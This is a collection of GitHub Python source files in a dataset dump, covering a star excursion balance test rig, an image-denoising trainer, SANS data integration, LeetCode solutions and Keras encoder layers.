[]\nposterior_CofMs_op = []\n\n\n# function for conducting each stage of the SEBT test\ndef conduct_stage(stage_array: list[float], leg: str, CofM_array: list[tuple], stage_name: str):\n while (1):\n\n # Call the get data function - it will return an array containing the load cell values and knee angle\n loadcells, bno, emg = bluetoothCommObject.getData()\n\n print(\"Raw Loadcell Values\" + str(loadcells))\n # print(emg)\n print(\"Knee angle: \" + str(bno))\n\n # calcluating center of mass value\n XCofM, YCofM = get_Cof_M(loadcells)\n\n # printing x and y values of center of mass for debugging purposes\n print('Center of Mass: (' + str(XCofM) + ',' + str(YCofM)+')')\n\n # adding data to arrays for later plotting\n stage_array.append(bno)\n CofM_array.append((XCofM, YCofM))\n\n time.sleep(0.150) # Sleep for 1 second\n\n if keyboard.is_pressed(' '):\n print(\n f\"SEBT test in the {stage_name} direction finished on the {leg} leg.\")\n break\n\n\n# first stage of SEBT test (anterior) on non-operative leg\ninput('Ready for anterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_nonop, 'non-operative',\n anterior_CofMs_nonop, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# first stage of SEBT test (anteromedial) on non-operative leg\ninput('Ready for anteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_nonop, 'non-operative',\n anteromedial_CofMs_nonop, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on non-operative leg\ninput('Ready for anterolateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_nonop, 'non-operative',\n anterolateral_CofMs_nonop, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on non-operative leg\ninput('Ready for lateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_nonop, 'non-operative',\n lateral_CofMs_nonop, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on non-operative leg\ninput('Ready for posterolateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_nonop, 'non-operative',\n posterolateral_CofMs_nonop, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on non-operative leg\ninput('Ready for posterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_nonop, 'non-operative',\n posterior_CofMs_nonop, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteriomedial) on non-operative leg\ninput('Ready for posteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posteromedial_SEBT_nonop, 'non-operative',\n posteromedial_CofMs_nonop, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on non-operative leg\ninput('Ready for medial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_nonop, 'non-operative', medial_CofMs_nonop, 'medial')\nprint(\"SEBT testing for the non-operative leg finished. Please place the apparatus on the operative leg in order to conduct the test again.\")\n\n# first stage of SEBT test (anterior) on operative leg\ninput('Ready for anterior orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_op, 'operative',\n anterior_CofMs_op, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# first stage of SEBT test (anteromedial) on operative leg\ninput('Ready for anteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_op, 'operative',\n anteromedial_CofMs_op, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on operative leg\ninput('Ready for anterolateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_op, 'operative',\n anterolateral_CofMs_op, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on operative leg\ninput('Ready for lateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_op, 'operative',\n lateral_CofMs_op, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on operative leg\ninput('Ready for posterolateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_op, 'operative',\n posterolateral_CofMs_op, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on operative leg\ninput('Ready for posterior orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_op, 'operative',\n posterior_CofMs_op, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteriomedial) on operative leg\ninput('Ready for posteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posteromedial_SEBT_op, 'operative',\n posteromedial_CofMs_op, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on operative leg\ninput('Ready for medial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_op, 'operative', medial_CofMs_op, 'medial')\nprint(\"SEBT testing for the operative leg finished. Finished testing, please remove apparatus.\")\n\n\n# debugging purposes\nSEBT_data = {\n 'Anterior': [anterior_SEBT_op, anterior_SEBT_nonop],\n 'Anterolateral': [anterolateral_SEBT_op, anterolateral_SEBT_nonop],\n 'Anteromedial': [anteromedial_SEBT_op, anteromedial_SEBT_nonop],\n 'Lateral': [lateral_SEBT_op, lateral_SEBT_nonop],\n 'Medial': [medial_SEBT_op, medial_SEBT_nonop],\n 'Posterolateral': [posterolateral_SEBT_op, posterolateral_SEBT_nonop],\n 'Posteromedial': [posteromedial_SEBT_op, posteromedial_SEBT_nonop],\n 'Posterior': [posterior_SEBT_op, posterior_SEBT_nonop]\n}\n\nCofM_data = {\n 'Anterior': [anterior_CofMs_op, anterior_CofMs_nonop],\n 'Anterolateral': [anterolateral_CofMs_op, anterolateral_CofMs_nonop],\n 'Anteromedial': [anteromedial_CofMs_op, anteromedial_CofMs_nonop],\n 'Lateral': [lateral_CofMs_op, lateral_CofMs_nonop],\n 'Medial': [medial_CofMs_op, medial_CofMs_nonop],\n 'Posterolateral': [posterolateral_CofMs_op, posterolateral_CofMs_nonop],\n 'Posteromedial': [posteromedial_CofMs_op, posteromedial_CofMs_nonop],\n 'Posterior': [posterior_CofMs_op, posterior_CofMs_nonop]\n}\n\n\nfor item in SEBT_data:\n plot_SEBT_graph(SEBT_data[item][0], SEBT_data[item][1], item)\nprint(\"graphs saved to folder\")\n\n# debugging, remove later\n#print(SEBT_data)\n\n# debugging, remove later\n#print(CofM_data)\n\n# saving CofM images to folder\nfor item in CofM_data:\n plot_CofM_deviations(CofM_data[item][0], CofM_data[item][1], item)\n\n\n# getting filenames to send as attachments\nanglefiles = ['sebt/' + f for f in listdir('sebt') if isfile(join('sebt', f))]\nCofMfiles = ['CofM_images/' +\n f for f in listdir('CofM_images') if isfile(join('CofM_images', f))]\n\nfile_names = anglefiles + CofMfiles\n\nsend_emails([clinician_email], file_names, SEBT_data, CofM_data)\n","repo_name":"DorianKnight/IBEHS-3P04-ACL-Reconstruction","sub_path":"Testreceive.py","file_name":"Testreceive.py","file_ext":"py","file_size_in_byte":11797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41538224999","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#np.random.seed(1234)\n#print(np.random.randn(4))\n\nX = np.array([[147, 150, 153, 158, 163, 165, 168, 170, 173, 175, 178, 180, 183]]).transpose()\ny = np.array([[5, 6, 7, 8, 9, 10]])\none = np.ones((X.shape[0], 1))\ntest = np.concatenate((one, X), axis = 1)\nprint(X)\nprint(test)","repo_name":"phamquanganhBKSET/machine_learning","sub_path":"math/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40600068606","text":"# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass Solution(object):\n def insert(self, intervals, newInterval):\n \"\"\"\n :type intervals: List[Interval]\n :type newInterval: Interval\n :rtype: List[Interval]\n \"\"\"\n\n n = len(intervals)\n overlap = 0 # 重叠区间数\n i = 0\n while i < n:\n # 1. 如果新区间的末尾小于当前区间的开头,则跳出循环\n if newInterval.end < intervals[i].start:\n break\n # 2. 如果新区间的开头大于当前区间的末尾,不作处理\n elif newInterval.start > intervals[i].end:\n pass\n # 3. 如果新区间和当前区间有重叠,合并区间\n else:\n newInterval.start = min(intervals[i].start, newInterval.start)\n newInterval.end = max(intervals[i].end, newInterval.end)\n overlap += 1\n i += 1\n\n # 如果有区间重叠,删除数组中所有与新区间重叠的区间\n if overlap > 0:\n intervals = intervals[:i-overlap] + intervals[i:]\n intervals.insert( i - overlap, newInterval)\n return intervals\n \n \n \nintervals = []\ntmp = Interval(1,3)\nintervals.append(tmp)\ntmp = Interval(6,9)\nintervals.append(tmp)\n# tmp = Interval(2,6)\n# intervals.append(tmp)\n# tmp = Interval(15,18)\n# intervals.append(tmp)\n\nnewInterval = Interval(0, 1)\n\ns = Solution()\nr = s.insert(intervals, newInterval)\nfor i in range(len(r)):\n\tprint(r[i].start, r[i].end)","repo_name":"Rosevil1874/LeetCode-Solution-Python-Java","sub_path":"Python-Solution/57_Insert-Interval/57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"38"}
+{"seq_id":"7564592868","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Write a Python Program to get the third side of right angled triangle from two given sides?\n\n# In[1]:\n\n\nfrom math import sqrt\n\n\n# In[ ]:\n\n\nprint('Enter length of two given sides')\na=float(input('Enter a :'))\nb=float(input('Enter b :'))\nc=sqrt(a**2 + b**2)\nprint('The length of third side',c)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"RohitDhuriya/Internship","sub_path":"Python worksheet 1 Q no.14 (1).py","file_name":"Python worksheet 1 Q no.14 (1).py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22046323536","text":"import os\nimport argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as utils\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom models import DnCNN\nfrom dataset import prepare_data, Dataset\nfrom utils import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# 参数管理\nparser = argparse.ArgumentParser(description=\"DnCNN\")\nparser.add_argument(\"--preprocess\", type=bool, default=False, help='run prepare_data or not')\nparser.add_argument(\"--batchSize\", type=int, default=64, help=\"Training batch size\")\nparser.add_argument(\"--num_of_layers\", type=int, default=17, help=\"Number of total layers\")\nparser.add_argument(\"--epochs\", type=int, default=50, help=\"Number of training epochs\")\nparser.add_argument(\"--milestone\", type=int, default=30, help=\"When to decay learning rate; should be less than epochs\")\nparser.add_argument(\"--lr\", type=float, default=1e-3, help=\"Initial learning rate\")\nparser.add_argument(\"--outf\", type=str, default=\"train_logs\", help='path of log files')\nparser.add_argument(\"--logdir\", type=str, default=\"test_logs\", help='path of log files')\nparser.add_argument(\"--noiseL\", type=float, default=25, help='noise level')\nparser.add_argument(\"--val_noiseL\", type=float, default=25, help='noise level used on validation set')\nopt = parser.parse_args()\n\n\ndef main():\n # Load dataset\n print('Loading dataset ...\\n')\n dataset_train = Dataset(train=True)\n dataset_val = Dataset(train=False)\n loader_train = DataLoader(dataset=dataset_train, num_workers=4, batch_size=opt.batchSize, shuffle=True)\n print(\"# of training samples: %d\\n\" % int(len(dataset_train)))\n # Build model\n net = DnCNN(channels=1, num_of_layers=opt.num_of_layers) # 实例化网络,通道数为1(针对灰度图像)\n net.apply(weights_init_kaiming) # 权重初始化\n criterion = nn.MSELoss(reduction='sum') # loss标准为L2均方和\n # Move to GPU\n device_ids = [0]\n model = nn.DataParallel(net, device_ids=device_ids).cuda()\n criterion.cuda()\n # Optimizer\n optimizer = optim.Adam(model.parameters(), lr=opt.lr) # 使用Adam优化算法\n # training\n writer = SummaryWriter(opt.outf) # 记录训练logs\n step = 0\n for epoch in range(opt.epochs):\n if epoch < opt.milestone:\n current_lr = opt.lr\n else: # 当周期数超过milestone,衰减学习率,防止过拟合\n current_lr = opt.lr / 10.\n # set learning rate\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = current_lr\n print('learning rate %f' % current_lr)\n # train\n for i, data in enumerate(loader_train, 0):\n # training step\n model.train() # 训练模式,确保BN参数在训练过程中更新\n model.zero_grad() # 初始化模型梯度\n optimizer.zero_grad() # 初始化优化器梯度\n img_train = data\n noise = torch.FloatTensor(img_train.size()).normal_(mean=0, std=opt.noiseL / 255.) # 生成加性白噪声\n imgn_train = img_train + noise # 生成噪声图像\n img_train, imgn_train = Variable(img_train.cuda()), Variable(imgn_train.cuda()) # 激活GPU计算\n noise = Variable(noise.cuda())\n out_train = model(imgn_train) # 应用模型\n loss = criterion(out_train, noise) / (imgn_train.size()[0] * 2) # 计算loss\n loss.backward() # 反向传播\n optimizer.step() # 更新网络参数\n # results\n model.eval() # 测试模式,确保BN参数在训练过程中不变\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.) # 归一化\n psnr_train = batch_PSNR(out_train, img_train, 1.) # 计算信噪比\n print(\"[epoch %d][%d/%d] loss: %.4f PSNR_train: %.4f\" %\n (epoch + 1, i + 1, len(loader_train), loss.item(), psnr_train))\n if step % 10 == 0:\n # Log the scalar values\n writer.add_scalar('loss', loss.item(), step)\n writer.add_scalar('PSNR on training data', psnr_train, step)\n step += 1\n ## the end of each epoch\n model.eval()\n # validate\n psnr_val = 0 # 平均信噪比\n for k in range(len(dataset_val)):\n img_val = torch.unsqueeze(dataset_val[k], 0) # 增加维度\n noise = torch.FloatTensor(img_val.size()).normal_(mean=0, std=opt.val_noiseL / 255.)\n imgn_val = img_val + noise # 生成加性白噪声图像\n with torch.no_grad(): # 节省显存\n img_val, imgn_val = Variable(img_val.cuda()), Variable(imgn_val.cuda())\n out_val = torch.clamp(imgn_val - model(imgn_val), 0., 1.)\n psnr_val += batch_PSNR(out_val, img_val, 1.)\n psnr_val /= len(dataset_val) # 计算平均信噪比\n print(\"\\n[epoch %d] PSNR_val: %.4f\" % (epoch + 1, psnr_val))\n writer.add_scalar('PSNR on validation data', psnr_val, epoch + 1)\n # log the images\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.)\n Img = utils.make_grid(img_train.data, nrow=8, normalize=True, scale_each=True) # 原图像网格\n Imgn = utils.make_grid(imgn_train.data, nrow=8, normalize=True, scale_each=True) # 噪声图像网格\n Irecon = utils.make_grid(out_train.data, nrow=8, normalize=True, scale_each=True) # 降噪图像网格\n writer.add_image('clean image', Img, epoch)\n writer.add_image('noisy image', Imgn, epoch)\n writer.add_image('reconstructed image', Irecon, epoch)\n # save model\n torch.save(model.state_dict(), os.path.join(opt.outf, 'net.pth'))\n torch.save(model.state_dict(), os.path.join(opt.logdir, 'net.pth'))\n\n\nif __name__ == \"__main__\":\n if opt.preprocess: # 如需要,进行数据集预处理\n prepare_data(data_path='data', patch_size=40, stride=10, aug_times=1)\n main()\n","repo_name":"joeyscave/cv","sub_path":"lab 2 : Image Denosing/lab2 : Image DeNoising/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"27305195591","text":"from tkinter import Tk\n\nfrom app.ui.application_ui import ApplicationUi\n\n\ndef start_app():\n root = Tk()\n root.minsize(width=800, height=600)\n app = ApplicationUi(root)\n root.mainloop()\n\n\nif __name__ == '__main__':\n start_app()\n","repo_name":"oallaire/assembly-pdf-generator","sub_path":"app/app_main.py","file_name":"app_main.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70130360750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 27 21:47:30 2023\n\n@author: lutzbueno_v\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom utils import load_hdf\nimport re\nimport plot_integration as plot_integ\nfrom utils import create_analysis_folder\nfrom utils import save_results\nfrom correction import prepare_corrections\nfrom correction import load_standards\nfrom correction import load_and_normalize\nfrom correction import correct_dark\nfrom correction import correct_EC\nfrom calibration import absolute_calibration\n\n\ndef set_integration(config, result):\n # find all files in the folder\n path_dir_an = create_analysis_folder(config)\n list_dir = list(os.listdir(path_dir_an))\n force_reintegrate = config['analysis']['force_reintegrate']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n for folder_name in list_dir:\n if folder_name[0:3] == 'det':\n det = folder_name[4:]\n path_det = os.path.join(path_dir_an, str(folder_name))\n # create poni and masks\n path_rad_int = os.path.join(path_det, 'integration/')\n if not os.path.exists(path_rad_int):\n os.mkdir(path_rad_int)\n # name the sample\n path = path_rad_int\n prefix = 'radial_integ'\n class_file = result['overview']['det_files_' + det]\n scanNr = class_file['scan'][-1]\n sample_name = class_file['sample_name'][-1]\n frame = 0\n sufix = 'dat'\n last_file = make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame)\n # check if we want to integrate\n if os.path.exists(last_file) and force_reintegrate == 0:\n print('All files are already integrated at ' + det + 'm')\n else:\n prepare_corrections(config, result, det)\n if perform_abs_calib == 1:\n result = load_standards(config, result, det)\n result = integrate(config, result, det, path_rad_int)\n return result\n\ndef make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame):\n file_n = path + prefix + '_' + f\"{scanNr:07d}\" + '_'+ f\"{frame:05d}_\" + sample_name + '_' +'det' + det + 'm'+ '.' + sufix\n return file_n\n\ndef integrate(config, result, det, path_rad_int):\n plt.ioff()\n path_hdf_raw = config['analysis']['path_hdf_raw']\n class_file = result['overview']['det_files_'+ det]\n # correct to absolute scale\n perform_abs_calib = config['analysis']['perform_abs_calib']\n perform_azimuthal = config['analysis']['perform_azimuthal']\n perform_radial = config['analysis']['perform_radial']\n class_file = result['overview']['det_files_'+ det]\n\n # pixel range defines how many q the final curve will contain\n pixel_range = range(0, 100)\n result['integration']['pixel_range'] = pixel_range\n # execute the corrections for all\n print('DOING ' + str(det) + 'm')\n for ii in range(0, len(class_file['sample_name'])):\n name_hdf = class_file['name_hdf'][ii]\n sample_name = class_file['sample_name'][ii]\n scanNr = class_file['scan'][ii]\n # do radial integration for each frame\n for ff in range(0, class_file['frame_nr'][ii]):\n if perform_abs_calib == 1:\n dark = result['integration']['cadmium']\n img = load_and_normalize(config, result, name_hdf)\n # Subtract empty cell and Cadmium\n img_cell = result['integration']['empty_cell']\n # subraction of empty cell\n if class_file['frame_nr'][ii] > 1:\n img1 = correct_dark(img[ff,:,:], dark)\n img1 = correct_EC(img1, img_cell)\n else:\n img1 = correct_dark(img, dark)\n img1 = correct_EC(img1, img_cell)\n print('Corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\n else:\n img = load_hdf(path_hdf_raw, name_hdf, 'counts')\n if class_file['frame_nr'][ii] > 1:\n img1 = img[ff,:,:]\n else:\n img1=img\n print('NOT corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\n img1= np.squeeze(img1)\n # get the frame number\n frame = ff\n # azimuthal integration\n if perform_radial == 1:\n # name the sample\n prefix = 'pattern2D'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n np.savetxt(file_name, img1, delimiter=',')\n # name the sample\n prefix = 'radial_integ'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n radial_integ(config, result, img1, file_name)\n if perform_azimuthal == 1:\n # name the sample\n prefix = 'azim_integ'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n azimuthal_integ(config, result, img1, file_name)\n plot_radial_integ(config, result, file_name)\n return result\n\n\ndef radial_integ(config, result, img1, file_name):\n ai = result['integration']['ai']\n mask = result['integration']['int_mask']\n pixel_range = result['integration']['pixel_range']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n # integrate for radial plots\n q, I, sigma = ai.integrate1d(img1, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model=\"azimuthal\",\n flat = None,\n dark = None)\n if perform_abs_calib == 1:\n # correct for the number of pixels\n flat = flat = result['integration']['water']\n q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model=\"azimuthal\",\n flat = None,\n dark = None)\n I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\n # save the integrated files\n data_save = np.column_stack((q, I, sigma))\n header_text = 'q (A-1), absolute intensity I (1/cm), standard deviation'\n np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\n\ndef azimuthal_integ(config, result, img1, file_name):\n ai = result['integration']['ai']\n mask = result['integration']['int_mask']\n pixel_range = result['integration']['pixel_range']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n # define the number of sectors\n sectors_nr = 16\n # integrate for azimuthal plots\n npt_azim = range(0, 370, int(360/sectors_nr))\n result['integration']['sectors_nr'] = sectors_nr\n result['integration']['npt_azim'] = npt_azim\n for rr in range(0, len(npt_azim)-1):\n azim_start = npt_azim[rr]\n azim_end = npt_azim[rr+1]\n q, I, sigma = ai.integrate1d(img1, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n if perform_abs_calib == 1:\n # correct for the number of pixels\n flat = result['integration']['water']\n q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\n if rr == 0:\n I_all = I\n sigma_all = sigma\n else:\n I_all = np.column_stack((I_all,I))\n sigma_all = np.column_stack((sigma_all, sigma))\n #save the integrated data\n data_save = np.column_stack((q, I_all, sigma_all))\n header_text = 'q (A-1), ' + str(sectors_nr) + ' columns for absolute intensity I (1/cm), '+ str(sectors_nr) + ' columns for standard deviation'\n np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\ndef plot_radial_integ(config, result, file_name):\n # plot and save the results\n if config['analysis']['plot_azimuthal'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_azimuthal(config, result, ScanNr, Frame)\n\n if config['analysis']['plot_radial'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_radial(config, result, ScanNr, Frame)\n","repo_name":"vivianel/DarePy-SANS","sub_path":"codes/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":10616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"32070649049","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\n You have an undirected, connected graph of n nodes labeled from 0 to n - 1. You are given an array graph where graph[i] is a list of all the nodes connected with node i by an edge.\n\n Return the length of the shortest path that visits every node. You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.\n\n Example 1:\n\n Input: graph = [[1,2,3],[0],[0],[0]]\n Output: 4\n Explanation: One possible path is [1,0,2,0,3]\n Example 2:\n\n Input: graph = [[1],[0,2,4],[1,3,4],[2],[1,2]]\n Output: 4\n Explanation: One possible path is [0,1,4,2,3]\n \"\"\"\n def shortestPathLength1(self, graph: List[List[int]]) -> int:\n n = len(graph)\n if n == 1:\n return 0\n que = []\n visited = set()\n for node, _ in enumerate(graph):\n state = 1 << node\n que.append((0, node, state))\n visited.add((node, state))\n target = (1 << n) - 1\n\n while que:\n dis, node, state = deque.heappop(que)\n for nei in graph[node]:\n nei_state = 1 << nei | state\n if nei_state == target:\n return dis + 1\n if (nei, nei_state) in visited:\n continue\n deque.heappush(que, (dis + 1, nei, nei_state))\n visited.add((nei, nei_state))\n \n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n final_mask = (1 << n) - 1\n\n que = deque([[i, 1 << i, 0] for i in range(n)])\n visited = set((i, i << i) for i in range(n))\n while que:\n node, mask, steps = que.popleft()\n if mask == final_mask:\n return steps\n for neighbor in graph[node]:\n new_mask = mask | (1 << neighbor)\n if (neighbor, new_mask) not in visited:\n visited.add((neighbor, new_mask))\n que.append([neighbor, new_mask, steps + 1])\n return -1\n\n","repo_name":"benbendaisy/CommunicationCodes","sub_path":"python_module/examples/847_Shortest_Path_Visiting_All_Nodes.py","file_name":"847_Shortest_Path_Visiting_All_Nodes.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21595466156","text":"import tensorflow as tf\nfrom model.module import transformer\n\n\n# prac 1\nclass CNNBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(CNNBasedEncoder, self).__init__()\n self.cnn_layers = []\n for i in range(args.encoder_n_layer):\n self.cnn_layers.append(\n tf.keras.layers.Conv1D(args.dim_embedding, args.cnn_kernel_size, padding='same', activation='relu'\n , name='cnn_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for cnn_layer in self.cnn_layers:\n out = cnn_layer(out)\n\n return out\n\n\n# prac 1\nclass LSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(LSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n self.lstm_layers.append(\n tf.keras.layers.LSTM(args.dim_embedding, return_sequences=True, name='lstm_layer_{}'.format(str(i)))\n )\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\n# prac_1\n# Bidirectional : https://www.tensorflow.org/api_docs/python/tf/keras/layers/Bidirectional\nclass BiLSTMBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(BiLSTMBasedEncoder, self).__init__()\n self.lstm_layers = []\n for i in range(args.encoder_n_layer):\n # 빈칸 작성\n print('빈칸 작성')\n\n def call(self, inputs):\n out = inputs\n\n for lstm_layer in self.lstm_layers:\n out = lstm_layer(out)\n\n return out\n\n\nclass TransformerBasedEncoder(tf.keras.layers.Layer):\n def __init__(self, args):\n super(TransformerBasedEncoder, self).__init__()\n self.transformer_layers = []\n for i in range(args.encoder_n_layer):\n self.transformer_layers.append(\n transformer.TransformerEncoderLayer(embed_dim=args.dim_embedding,\n num_heads=args.encoder_n_head,\n ff_dim=args.dim_embedding)\n )\n\n def call(self, inputs):\n x = inputs\n x_q, x_k, x_v = x, x, x\n\n for transformer_layer in self.transformer_layers:\n x_q = transformer_layer(x_q, x_k, x_v)\n x_k = x_q\n x_v = x_q\n\n return x_q\n","repo_name":"jhlee17139/TFNLP_prac","sub_path":"model/module/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
